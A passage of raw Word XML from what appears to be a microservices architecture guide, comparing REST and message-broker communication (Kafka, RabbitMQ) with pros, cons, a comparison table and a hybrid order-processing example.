            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36963CF9"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oogle Cloud’s enterprise API management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w14:paraId="6B78C1EC" w14:textId="77777777" w:rsidTr="009F0DEB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792D6F03"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stio Ingress Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F08B0F0" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="009F0DEB">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with service mesh architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12B479AA" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F0DE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E65AF29">
          <v:rect id="_x0000_i2770" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC3D36" w14:textId="77777777" w:rsidR="009F0DEB" w:rsidRPr="00CE4B95" w:rsidRDefault="009F0DEB" w:rsidP="009F0DEB">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Example Architecture with API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D54DC" w14:textId="70A7F24C" w:rsidR="00FC23F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC23F5" w:rsidP="00FC23F5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76074E7C" wp14:editId="3FC24663">
            <wp:extent cx="4086970" cy="2295015"/>
            <wp:effectExtent l="57150" t="57150" r="104140" b="86360"/>
            <wp:docPr id="1264073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73712" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4098264" cy="2301357"/>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0FEF7C7F" w14:textId="78013623" w:rsidR="00F550BA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC23F5">
      <w:pPr>
        <w:jc w:val="cente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1EF64F8">
          <v:rect id="_x0000_i2771" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B91A9" w14:textId="5C8A5BCC" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00280198">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="673" w:name="_Toc196308153"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inter-service communication: REST vs Messaging</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="673"/>
    </w:p>
    <w:p w14:paraId="3011266C" w14:textId="74C2186C" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00B65F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Inter-Service Communication: REST vs Messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBBCDA" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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EST (Synchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088B2D8"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ST uses HTTP protocols (usually over JSON) for communication between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1741AC10" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D72A001" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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mple and widely adopted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41712290" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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sy to debug and test (Postman, curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47C887" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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orks well when immediate response is needed (e.g., GET /orders/1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4B131" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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ns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E8FF2" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ightly coupled: if Service B is down, Service A fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24952D61" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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creased latency with chained service calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA9C63" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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rder to scale under heavy load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E33A4" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0010518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6CC26D5">
          <v:rect id="_x0000_i2772" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="492004D4" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Messaging (Asynchronous Communication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66025E"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s message brokers (like Kafka, RabbitMQ, ActiveMQ) to send/receive messages between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2075C9AF" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C70A06" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ose coupling: services don’t need to know each other’s availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD88503" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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igh scalability and throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C738F18" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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reat for event-driven architecture (e.g., “OrderPlaced” event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68455EBD" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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ns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48505C64" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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re complex to set up and monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5391A" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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ventual consistency (response is not immediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539C6CF1" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>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rder to trace/debug (needs distributed tracing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C32DE" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0010518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0FA7DF1">
          <v:rect id="_x0000_i2773" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="760835E7"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REST vs Messaging: Comparis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23"/>
        <w:gridCol w:w="2730"/>
        <w:gridCol w:w="3493"/>
      </w:tblGrid>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="491DF805" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3408D528" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00917A85">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51E62B48" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00917A85">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REST (HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06175B80" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00917A85">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Messaging (Kafka, RabbitMQ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="5909B57C" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DC0AC57"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munication Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03A034E4"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ynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3419B38B"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synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="2C38A2A6" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="648435A7"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upling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0B3F2E"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ight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D8396B0"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ose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="43C62B41" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C48370"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vailability Dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74F31DF3"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rvice must be up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD0F14F"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nder and receiver can be decoupled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="4CE1CC54" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2476485D"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ata Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C2D2E7"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ong consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1521CDD3"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ventual consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="3412E18B" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D688098"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liability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D1A0508"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ess reliable (network failure)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3FFE7D"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re reliable (can retry, durable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="6EB6B8F1" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53636D0F"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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="285BB0F1"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mited by sync calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609FD4E1"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ighly scalable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="6B2FC257" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E1E365"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atency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EDD7E9E"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w (if successful)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="724F6703"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be delayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="283E34BE" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223F854F"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rror Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E9EB5B"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eeds retries or fallbacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF70316"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uilt-in retry, dead-letter queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00105186" w:rsidRPr="00CE4B95" w14:paraId="36E5AF9D" w14:textId="77777777" w:rsidTr="00105186">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757A1704"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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67D1E4EB"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al-time requests/responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A47FDEF"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ackground jobs, event notification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="248EE231" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0010518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4BE41BF">
          <v:rect id="_x0000_i2774" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18884892" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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en to Use What?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F54C98D" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Use REST when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C50F20" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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al-time response is required (e.g., Login, Search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1FD7D" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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mpler integration with frontends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C68D76" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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quest/response fits a client-server pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DB4AC" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Use Messaging when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1478E4EE" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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want decoupled, event-driven architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF34C02" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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perations can be processed asynchronously (e.g., Order confirmation, Email sending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7E8DB" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>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igh volume of traffic or batching is expected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CE469" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0010518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1ED02E4">
          <v:rect id="_x0000_i2775" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A837B98" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Hybrid Approach (Best Practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11293BD5" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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st production-grade microservice systems use both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E90409" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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REST for synchronous, real-time operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867ED39" w14:textId="6C35A7C1" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>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 messaging/event streams for decoupled, asynchronous workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36046E30" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6303F00B"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Order Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CB036" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ST: POST /order → creates order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0D5C4" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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vent: publishes OrderCreated to Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135AB5A"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ventory Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB6BCC" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ens to OrderCreated → updates stock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52632B41" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186" w:rsidP="00105186">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tification Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F34A7" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00105186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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stens to OrderCreated → sends email/SMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813D4EB" w14:textId="77777777" w:rsidR="00105186" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0010518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6B31A9F">
